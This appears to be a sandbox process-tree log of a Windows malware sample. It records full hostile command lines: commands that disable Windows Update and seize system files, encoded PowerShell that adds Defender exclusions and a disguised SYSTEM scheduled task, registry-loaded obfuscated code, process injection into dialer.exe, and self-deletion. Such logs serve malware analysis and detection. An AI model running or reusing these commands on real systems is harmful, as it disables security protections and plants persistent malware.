"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:3692

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2060

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:2804

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:2912

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:3680

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:4572

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:3744

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:3092

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:4404

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:4540

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1772

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:188

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4932

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4044

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:420

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4884

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4540

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2892

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:2752

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:32

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:416

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1404

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:4552

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:64

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:2396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:4300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4752

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:4088

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:3608

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
PID:4884

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:3400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4888

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3648

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "epzggvhm"
4⤵
PID:3688

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J
4⤵
- Executes dropped EXE
PID:5024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4468

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:4484

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4804

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1212

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2832

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1240

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1248

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1656

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1828

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4984

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4076

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4004

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4004 -s 784
2⤵
- Program crash
PID:2364

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3748

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3748 -s 876
2⤵
- Program crash
PID:5092

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3580

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3104

C:\Users\Admin\AppData\Local\Temp\c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe
"C:\Users\Admin\AppData\Local\Temp\c15231a4fb2bc6c5f0609dc0a5954e01cbc3fbd2fcc74decf88abd156a7f2e8d.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2556

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2892

C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exe
"C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2952

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exe"
5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
- Suspicious use of WriteProcessMemory
PID:5080

C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
- Launches sc.exe
PID:4420

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
- Launches sc.exe
PID:4560

C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
- Launches sc.exe
PID:4540

C:\Windows\system32\sc.exe
sc stop bits
7⤵
- Launches sc.exe
PID:1772

C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
- Launches sc.exe
PID:1032

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
7⤵
- Modifies registry key
PID:1272

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
7⤵
- Modifies registry key
PID:396

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
7⤵
- Modifies security service
- Modifies registry key
PID:1852

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
7⤵
- Modifies registry key
PID:592

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
7⤵
- Modifies registry key
PID:4704

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3404

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1404

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:1892

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:2828

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:2072

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
7⤵
PID:3920

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
7⤵
PID:2932

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
7⤵
PID:4100

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
7⤵
PID:4464

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
7⤵
PID:2060

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:3464

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:2912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of WriteProcessMemory
PID:5064

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"
6⤵
PID:2300

C:\Windows\system32\schtasks.exe
schtasks /run /tn "WindowsDefender"
7⤵
PID:2592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exe"
6⤵
PID:2212

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4056

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
7⤵
PID:4740

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2288

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1720

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1556

